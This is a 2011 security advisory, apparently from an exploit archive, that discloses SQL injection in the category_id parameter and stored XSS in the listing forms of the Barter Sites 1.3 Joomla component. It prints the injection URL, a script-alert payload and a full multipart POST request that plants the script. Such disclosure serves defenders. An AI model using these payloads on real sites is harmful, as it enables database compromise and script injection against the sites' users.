扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 |
#################################################################################### Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities #################################################################################### Release Date Bug.28-Oct-2011 Date Added.01-Oct-2011 Vendor Notification Date.Never Product. Barter Sites Platform.Joomla Affected versions. 1.3 Type.Commercial Price. $99 Attack Vector. Sql Injection & Persistent XSS Solution Status. unpublished CVE reference. Not yet assigned Download.www.barter-sites.com/content/getStarted I. BACKGROUND The Barter Sites extension is for operating a trade group. Members post listings in the barter directory on your site, send each other offers and messages, negotiate, and 'pay' with either direct trade or with your own private digital currency called trade credits. You can even issue lines of credit. Admin has the option to earn commissions on trade credit transfers and can run transactions for the members, serving as a barter broker. Features Include: * HTML Listings * Barter Wish-list * Direct Trade Offers * Virtual Private Currency * Trade Credit Transfers * Admin Broker/Transfer * Generate Invoices * Paypal Commissions * Member Reputations * Private Messaging * and more! II. DESCRIPTION Two vulnerabilities discovered - Category_id Parameter SQL injection - XSS in several places III.EXPLOITATION *INJECTION SQL parameter [category_id]: /index.php?option=com_listing&task=browse&category_id=1[SQL] [SQL]=Injection Sql *Persistent XSS main Register->> Login ---> barter>Post: or /index.php?option=com_listing&task=post&Itemid=2 Listing Title: <IMG """><SCRIPT>alert("XSS")</SCRIPT> selectioncategory. XSS look at: barter>selectioncategory ---->To view the xss is not necessary to be registered *Persistent XSS side In the form of the Post, you can insert xss in all settings: -Website Address -Payment types accepted -Sell Price -Shipping Cost -Quantity all can be inserted into the header, but for Facilides directly on the form all: <IMG """><SCRIPT>alert("XSS")</SCRIPT> *Persistent XSS in pictures If you prefer pictures to insert in the xss edit header values as follows: Get:/index.php?option=com_listing&task=listingsave Post: -----------------------------106542362324353\r\n Content-Disposition: form-data; name="listing_title"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="description"\r\n \r\n <p><IMG """><SCRIPT>alert("XSS")</SCRIPT></p>\r\n<-----------------------------------click here -----------------------------106542362324353\r\n Content-Disposition: form-data; name="homeurl"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="category_id"\r\n \r\n 34\r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="paystring"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="sell_price"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="shipping_cost"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="quantity"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="submit"\r\n \r\n Submit\r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="listing_id"\r\n \r\n \r\n -----------------------------106542362324353--\r\n Discovered by. Chris Russell |
体验盒子
